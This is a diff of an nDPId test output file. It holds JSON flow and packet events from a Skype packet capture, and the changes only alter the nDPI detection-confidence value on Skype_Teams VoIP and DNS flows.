00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":894,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970665893,"flow_last_seen":1431970665893,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970665893,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.161","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":894,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":144,"flow_packet_id":1,"flow_last_seen":1431970665893,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"thread_ts_msec":1431970665893,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1sE4AAEARMsfAqAEinTc4oTLdnF8AITASe2kC9psOqbEN3IbEA34wiMcNZp24IiAl1w=="} -00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":894,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970665893,"flow_last_seen":1431970665893,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970665893,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.161","src_port":13021,"dst_port":40031,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":894,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970665893,"flow_last_seen":1431970665893,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970665893,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.161","src_port":13021,"dst_port":40031,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":895,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970665893,"flow_last_seen":1431970665893,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970665893,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.148","src_port":13021,"dst_port":40033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":895,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":145,"flow_packet_id":1,"flow_last_seen":1431970665893,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1431970665893,"pkt":"0NQSxnP1PBXCt3IOCABFAAA9lmMAAEARmbbAqAEinTfrlDLdnGEAKXtSe2sCw7Vy\/6hHK2XTagfLmixWAHOAd\/loE1p\/EyV7QPa1"} -00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":895,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970665893,"flow_last_seen":1431970665893,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970665893,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.148","src_port":13021,"dst_port":40033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":895,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970665893,"flow_last_seen":1431970665893,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970665893,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.148","src_port":13021,"dst_port":40033,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00192{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":897,"source":"skype_no_unknown.pcap","alias":"nDPId-test","layer_type":94,"global_ts_msec":1431970666370} 00417{"packet_event_id":1,"packet_event_name":"packet","packet_id":897,"source":"skype_no_unknown.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":100,"pkt_type":94,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":100,"pkt_l4_len":0,"thread_ts_msec":1431970666274,"pkt":"AQAMzMzMJKQ8\/kzXAF6qqgMAAAwgAAF4S2kAAQAOQWlyR2F0ZXdheQACABEAAAABAQHMAATAqAHbAAQACAAAAAIABQAQQWlyR1cudjEuMC4zAAYAB0FHVwADAAdicjAA\/wAFLg=="} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":899,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970666902,"flow_last_seen":1431970666902,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970666902,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.142","src_port":51255,"dst_port":40005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -515,10 +515,10 @@ 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":902,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":1,"flow_last_seen":1431970666903,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970666903,"pkt":"0NQSxnP1PBXCt3IOCABFAABAfbxAAEAGcbnAqAEi1cezsMg6nFWOWkeEAAAAALAC\/\/9u6QAAAgQFtAEDAwUBAQgKPjIEMAAAAAAEAgAA"} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":903,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970666903,"flow_last_seen":1431970666903,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970666903,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.149","src_port":13021,"dst_port":40016,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":903,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":150,"flow_packet_id":1,"flow_last_seen":1431970666903,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1431970666903,"pkt":"0NQSxnP1PBXCt3IOCABFAAA9fE8AAEARfyTAqAEib91NlTLdnFAAKVN0e20CYiNLpCtZKVRm5qzsJsm2qgqqm\/VHJHAXu9AEnz3Z"} -00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":903,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970666903,"flow_last_seen":1431970666903,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970666903,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.149","src_port":13021,"dst_port":40016,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":903,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970666903,"flow_last_seen":1431970666903,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970666903,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.149","src_port":13021,"dst_port":40016,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":904,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970666903,"flow_last_seen":1431970666903,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970666903,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.19","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":904,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":151,"flow_packet_id":1,"flow_last_seen":1431970666903,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1431970666903,"pkt":"0NQSxnP1PBXCt3IOCABFAAA7vtoAAEARQB3AqAEib91KEzLdnEEAJxFYe28CrL8oxTm2+6Ol0c4xcn\/aCmr6scDIaqNamEoS7g=="} -00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":904,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970666903,"flow_last_seen":1431970666903,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970666903,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.19","src_port":13021,"dst_port":40001,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":904,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970666903,"flow_last_seen":1431970666903,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970666903,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.19","src_port":13021,"dst_port":40001,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":905,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":2,"flow_last_seen":1431970666958,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970666958,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADgG93nVx7OwwKgBIpxVyDpdiXkDjlpHhaASOJCjtgAAAgQFrAQCCApO3n4vPjIEMAEDAwk="} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":906,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":3,"flow_last_seen":1431970666958,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970666958,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0TkBAAEAGoUHAqAEi1cezsMg6nFWOWkeFXYl5BIAQECz6qQAAAQEICj4yBGdO3n4v"} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":908,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":2,"flow_last_seen":1431970666974,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970666974,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+g+dN+uqwKgBIpxgyDkZrLIb0UAi+qASOJChgQAAAgQFrAQCCApMVm\/iPjIEMAEDAwk="} @@ -529,19 +529,19 @@ 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":927,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":147,"flow_packet_id":3,"flow_last_seen":1431970667195,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970667195,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0KkFAAEAGkU3AqAEib91Njsg4nE30S7v4xRcL8IAQECxb2QAAAQEICj4yBU9NkBSe"} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":937,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970667913,"flow_last_seen":1431970667913,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970667913,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.140","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":937,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":152,"flow_packet_id":1,"flow_last_seen":1431970667913,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1431970667913,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6bg8AAEARKxbAqAEinTeCjDLdnEsAJgsKe3ECMurpMuGdyMUwflNlvhyptKR18dfr99Rpa+D7"} -00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":937,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970667913,"flow_last_seen":1431970667913,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970667913,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.140","src_port":13021,"dst_port":40011,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":937,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970667913,"flow_last_seen":1431970667913,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970667913,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.140","src_port":13021,"dst_port":40011,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":938,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970667913,"flow_last_seen":1431970667913,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970667913,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.167","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":938,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":153,"flow_packet_id":1,"flow_last_seen":1431970667913,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1431970667913,"pkt":"0NQSxnP1PBXCt3IOCABFAABBDu8AAEARihTAqAEinTeCpzLdnF8ALeNce3MCnSaJe8js0\/W0uOkrjvFqVEozNuFXZVFpbX\/qiFWAThpduA=="} -00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":938,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970667913,"flow_last_seen":1431970667913,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970667913,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.167","src_port":13021,"dst_port":40031,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":938,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970667913,"flow_last_seen":1431970667913,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970667913,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.167","src_port":13021,"dst_port":40031,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":939,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970667913,"flow_last_seen":1431970667913,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970667913,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":939,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":154,"flow_packet_id":1,"flow_last_seen":1431970667913,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1431970667913,"pkt":"0NQSxnP1PBXCt3IOCABFAAA4i7gAAEARb8PAqAEib91NkjLdgQkAJGEVe3UC\/j9SXtMCBQsEGLuepyVsXxpYMSM\/UQo5ag=="} -00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":939,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970667913,"flow_last_seen":1431970667913,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970667913,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":939,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970667913,"flow_last_seen":1431970667913,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970667913,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":941,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970668278,"flow_last_seen":1431970668278,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970668278,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63342,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":941,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":155,"flow_packet_id":1,"flow_last_seen":1431970668278,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970668278,"pkt":"0NQSxnP1PBXCt3IOCABFAABA6QgAAEARDjHAqAEiwKgBAfduADUALM6fTeoBAAABAAAAAAAAAWIGY29uZmlnBXNreXBlA2NvbQAAAQAB"} -00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":941,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970668278,"flow_last_seen":1431970668278,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970668278,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63342,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"b.config.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":941,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970668278,"flow_last_seen":1431970668278,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970668278,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63342,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"b.config.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":942,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970668278,"flow_last_seen":1431970668278,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970668278,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64258,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":942,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":156,"flow_packet_id":1,"flow_last_seen":1431970668278,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970668278,"pkt":"0NQSxnP1PBXCt3IOCABFAABAkhAAAEARZSnAqAEiwKgBAfsCADUALD+l2TUBAAABAAAAAAAAAWIGY29uZmlnBXNreXBlA2NvbQAAHAAB"} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":942,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970668278,"flow_last_seen":1431970668278,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970668278,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64258,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"b.config.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":942,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970668278,"flow_last_seen":1431970668278,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970668278,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64258,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"b.config.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 